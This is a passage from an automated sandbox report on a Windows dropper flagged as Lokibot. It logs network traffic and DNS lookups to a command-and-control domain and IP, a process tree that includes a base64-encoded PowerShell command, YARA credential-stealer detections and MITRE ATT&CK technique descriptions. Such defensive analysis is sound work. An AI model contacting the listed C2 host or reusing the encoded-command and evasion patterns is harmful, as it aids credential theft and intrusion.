Nov 29, 2022 16:52:28.194387913 CET	49720	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:28.224909067 CET	80	49720	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:28.224987030 CET	49720	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:28.227778912 CET	49720	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:28.258918047 CET	80	49720	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:28.259017944 CET	49720	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:28.287642002 CET	80	49720	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:28.346106052 CET	80	49720	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:28.346132994 CET	80	49720	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:28.346256971 CET	49720	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:28.346374989 CET	49720	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:28.374067068 CET	80	49720	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:28.664561987 CET	49721	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:28.696398973 CET	80	49721	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:28.697771072 CET	49721	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:28.704062939 CET	49721	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:28.731311083 CET	80	49721	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:28.731426001 CET	49721	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:28.758908033 CET	80	49721	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:28.798693895 CET	80	49721	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:28.798743010 CET	80	49721	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:28.798816919 CET	49721	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:28.798846960 CET	49721	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:28.825839996 CET	80	49721	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:29.469907999 CET	49722	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:29.496885061 CET	80	49722	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:29.497585058 CET	49722	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:29.504055977 CET	49722	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:29.531132936 CET	80	49722	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:29.535098076 CET	49722	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:29.563505888 CET	80	49722	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:29.613061905 CET	80	49722	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:29.613097906 CET	80	49722	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:29.613223076 CET	49722	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:29.613276958 CET	49722	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:29.640557051 CET	80	49722	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:29.990570068 CET	49723	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:30.019546986 CET	80	49723	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:30.019854069 CET	49723	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:30.023507118 CET	49723	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:30.051748991 CET	80	49723	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:30.051918030 CET	49723	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:30.080476999 CET	80	49723	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:30.124555111 CET	80	49723	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:30.124568939 CET	80	49723	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:30.124695063 CET	49723	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:30.124789000 CET	49723	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:30.153004885 CET	80	49723	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:30.451586008 CET	49724	80	192.168.2.7	141.98.6.102
Nov 29, 2022 16:52:30.484905958 CET	80	49724	141.98.6.102	192.168.2.7
Nov 29, 2022 16:52:30.485016108 CET	49724	80	192.168.2.7	141.98.6.102

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2022 16:51:27.731278896 CET	61178	53	192.168.2.7	8.8.8.8
Nov 29, 2022 16:51:27.812835932 CET	63926	53	192.168.2.7	8.8.8.8
Nov 29, 2022 16:51:29.055094004 CET	53336	53	192.168.2.7	8.8.8.8
Nov 29, 2022 16:51:29.128258944 CET	51007	53	192.168.2.7	8.8.8.8
Nov 29, 2022 16:52:24.965707064 CET	50024	53	192.168.2.7	8.8.8.8
Nov 29, 2022 16:52:24.983006954 CET	53	50024	8.8.8.8	192.168.2.7
Nov 29, 2022 16:52:25.609745979 CET	49516	53	192.168.2.7	8.8.8.8
Nov 29, 2022 16:52:25.627433062 CET	53	49516	8.8.8.8	192.168.2.7
Nov 29, 2022 16:52:27.231417894 CET	62679	53	192.168.2.7	8.8.8.8
Nov 29, 2022 16:52:27.248811960 CET	53	62679	8.8.8.8	192.168.2.7
Nov 29, 2022 16:52:27.735085964 CET	61392	53	192.168.2.7	8.8.8.8
Nov 29, 2022 16:52:27.754470110 CET	53	61392	8.8.8.8	192.168.2.7
Nov 29, 2022 16:52:28.174541950 CET	52104	53	192.168.2.7	8.8.8.8
Nov 29, 2022 16:52:28.192017078 CET	53	52104	8.8.8.8	192.168.2.7
Nov 29, 2022 16:52:28.646147966 CET	65356	53	192.168.2.7	8.8.8.8
Nov 29, 2022 16:52:28.663779020 CET	53	65356	8.8.8.8	192.168.2.7
Nov 29, 2022 16:52:29.136881113 CET	59006	53	192.168.2.7	8.8.8.8
Nov 29, 2022 16:52:29.469077110 CET	53	59006	8.8.8.8	192.168.2.7
Nov 29, 2022 16:52:29.972295046 CET	51526	53	192.168.2.7	8.8.8.8
Nov 29, 2022 16:52:29.989815950 CET	53	51526	8.8.8.8	192.168.2.7
Nov 29, 2022 16:52:30.432616949 CET	51139	53	192.168.2.7	8.8.8.8
Nov 29, 2022 16:52:30.450237989 CET	53	51139	8.8.8.8	192.168.2.7
Nov 29, 2022 16:52:30.865406036 CET	58784	53	192.168.2.7	8.8.8.8
Nov 29, 2022 16:52:30.884907961 CET	53	58784	8.8.8.8	192.168.2.7
Nov 29, 2022 16:52:31.290296078 CET	57970	53	192.168.2.7	8.8.8.8
Nov 29, 2022 16:52:31.307420969 CET	53	57970	8.8.8.8	192.168.2.7
Nov 29, 2022 16:52:31.765007019 CET	64608	53	192.168.2.7	8.8.8.8
Nov 29, 2022 16:52:31.782563925 CET	53	64608	8.8.8.8	192.168.2.7
Nov 29, 2022 16:52:32.148758888 CET	58746	53	192.168.2.7	8.8.8.8
Nov 29, 2022 16:52:32.166456938 CET	53	58746	8.8.8.8	192.168.2.7
Nov 29, 2022 16:52:32.638763905 CET	62433	53	192.168.2.7	8.8.8.8
Nov 29, 2022 16:52:32.656164885 CET	53	62433	8.8.8.8	192.168.2.7
Nov 29, 2022 16:52:33.218455076 CET	61248	53	192.168.2.7	8.8.8.8
Nov 29, 2022 16:52:33.237142086 CET	53	61248	8.8.8.8	192.168.2.7
Nov 29, 2022 16:52:33.705962896 CET	52750	53	192.168.2.7	8.8.8.8
Nov 29, 2022 16:52:33.725223064 CET	53	52750	8.8.8.8	192.168.2.7
Nov 29, 2022 16:52:36.268440008 CET	64078	53	192.168.2.7	8.8.8.8
Nov 29, 2022 16:52:36.289087057 CET	53	64078	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 29, 2022 16:51:27.731278896 CET	192.168.2.7	8.8.8.8	0xba30	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:51:27.812835932 CET	192.168.2.7	8.8.8.8	0xe1a	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:51:29.055094004 CET	192.168.2.7	8.8.8.8	0x8f25	Standard query (0)	edi4gw.db.files.1drv.com	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:51:29.128258944 CET	192.168.2.7	8.8.8.8	0xfe5b	Standard query (0)	edi4gw.db.files.1drv.com	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:24.965707064 CET	192.168.2.7	8.8.8.8	0xa4c6	Standard query (0)	sedesadre.gq	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:25.609745979 CET	192.168.2.7	8.8.8.8	0x4b90	Standard query (0)	sedesadre.gq	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:27.231417894 CET	192.168.2.7	8.8.8.8	0xdf42	Standard query (0)	sedesadre.gq	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:27.735085964 CET	192.168.2.7	8.8.8.8	0x3e67	Standard query (0)	sedesadre.gq	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:28.174541950 CET	192.168.2.7	8.8.8.8	0x8a32	Standard query (0)	sedesadre.gq	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:28.646147966 CET	192.168.2.7	8.8.8.8	0xed58	Standard query (0)	sedesadre.gq	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:29.136881113 CET	192.168.2.7	8.8.8.8	0xe22e	Standard query (0)	sedesadre.gq	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:29.972295046 CET	192.168.2.7	8.8.8.8	0xd42a	Standard query (0)	sedesadre.gq	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:30.432616949 CET	192.168.2.7	8.8.8.8	0xaba4	Standard query (0)	sedesadre.gq	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:30.865406036 CET	192.168.2.7	8.8.8.8	0x843c	Standard query (0)	sedesadre.gq	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:31.290296078 CET	192.168.2.7	8.8.8.8	0xcea1	Standard query (0)	sedesadre.gq	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:31.765007019 CET	192.168.2.7	8.8.8.8	0xbf29	Standard query (0)	sedesadre.gq	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:32.148758888 CET	192.168.2.7	8.8.8.8	0x2cc8	Standard query (0)	sedesadre.gq	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:32.638763905 CET	192.168.2.7	8.8.8.8	0xf86b	Standard query (0)	sedesadre.gq	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:33.218455076 CET	192.168.2.7	8.8.8.8	0x904c	Standard query (0)	sedesadre.gq	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:33.705962896 CET	192.168.2.7	8.8.8.8	0x2ec1	Standard query (0)	sedesadre.gq	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:36.268440008 CET	192.168.2.7	8.8.8.8	0xc48e	Standard query (0)	sedesadre.gq	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 29, 2022 16:51:27.775491953 CET	8.8.8.8	192.168.2.7	0xba30	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 16:51:27.832566023 CET	8.8.8.8	192.168.2.7	0xe1a	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 16:51:29.099885941 CET	8.8.8.8	192.168.2.7	0x8f25	No error (0)	edi4gw.db.files.1drv.com	db-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 16:51:29.099885941 CET	8.8.8.8	192.168.2.7	0x8f25	No error (0)	db-files.fe.1drv.com	odc-db-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 16:51:29.172468901 CET	8.8.8.8	192.168.2.7	0xfe5b	No error (0)	edi4gw.db.files.1drv.com	db-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 16:51:29.172468901 CET	8.8.8.8	192.168.2.7	0xfe5b	No error (0)	db-files.fe.1drv.com	odc-db-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 16:51:29.172468901 CET	8.8.8.8	192.168.2.7	0xfe5b	No error (0)	l-0003.l-dc-msedge.net		13.107.43.12	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:24.983006954 CET	8.8.8.8	192.168.2.7	0xa4c6	No error (0)	sedesadre.gq		141.98.6.102	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:25.627433062 CET	8.8.8.8	192.168.2.7	0x4b90	No error (0)	sedesadre.gq		141.98.6.102	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:27.248811960 CET	8.8.8.8	192.168.2.7	0xdf42	No error (0)	sedesadre.gq		141.98.6.102	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:27.754470110 CET	8.8.8.8	192.168.2.7	0x3e67	No error (0)	sedesadre.gq		141.98.6.102	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:28.192017078 CET	8.8.8.8	192.168.2.7	0x8a32	No error (0)	sedesadre.gq		141.98.6.102	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:28.663779020 CET	8.8.8.8	192.168.2.7	0xed58	No error (0)	sedesadre.gq		141.98.6.102	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:29.469077110 CET	8.8.8.8	192.168.2.7	0xe22e	No error (0)	sedesadre.gq		141.98.6.102	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:29.989815950 CET	8.8.8.8	192.168.2.7	0xd42a	No error (0)	sedesadre.gq		141.98.6.102	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:30.450237989 CET	8.8.8.8	192.168.2.7	0xaba4	No error (0)	sedesadre.gq		141.98.6.102	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:30.884907961 CET	8.8.8.8	192.168.2.7	0x843c	No error (0)	sedesadre.gq		141.98.6.102	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:31.307420969 CET	8.8.8.8	192.168.2.7	0xcea1	No error (0)	sedesadre.gq		141.98.6.102	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:31.782563925 CET	8.8.8.8	192.168.2.7	0xbf29	No error (0)	sedesadre.gq		141.98.6.102	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:32.166456938 CET	8.8.8.8	192.168.2.7	0x2cc8	No error (0)	sedesadre.gq		141.98.6.102	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:32.656164885 CET	8.8.8.8	192.168.2.7	0xf86b	No error (0)	sedesadre.gq		141.98.6.102	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:33.237142086 CET	8.8.8.8	192.168.2.7	0x904c	No error (0)	sedesadre.gq		141.98.6.102	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:33.725223064 CET	8.8.8.8	192.168.2.7	0x2ec1	No error (0)	sedesadre.gq		141.98.6.102	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:52:36.289087057 CET	8.8.8.8	192.168.2.7	0xc48e	No error (0)	sedesadre.gq		141.98.6.102	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

sedesadre.gq

Target ID:	0
Start time:	16:50:23
Start date:	29/11/2022
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
Imagebase:	0xd60000
File size:	313856 bytes
MD5 hash:	3039FA7B347872C33C247581A27A7560
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.521369809.0000000003243000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: powershell.exePID: 1508, Parent PID: 5092

General

Target ID:	1
Start time:	16:50:23
Start date:	29/11/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell" Get-Date
Imagebase:	0xe60000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: conhost.exePID: 5700, Parent PID: 1508

General

Target ID:	2
Start time:	16:50:24
Start date:	29/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exePID: 2084, Parent PID: 552

General

Target ID:	5
Start time:	16:50:41
Start date:	29/11/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff732630000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exePID: 1376, Parent PID: 5092

General

Target ID:	12
Start time:	16:51:46
Start date:	29/11/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Imagebase:	0xe60000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: conhost.exePID: 5096, Parent PID: 1376

General

Target ID:	13
Start time:	16:51:46
Start date:	29/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: RegAsm.exePID: 2084, Parent PID: 5092

General

Target ID:	14
Start time:	16:52:22
Start date:	29/11/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase:	0x650000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000E.00000000.513382566.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	high

Disassembly

⊘No disassembly

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
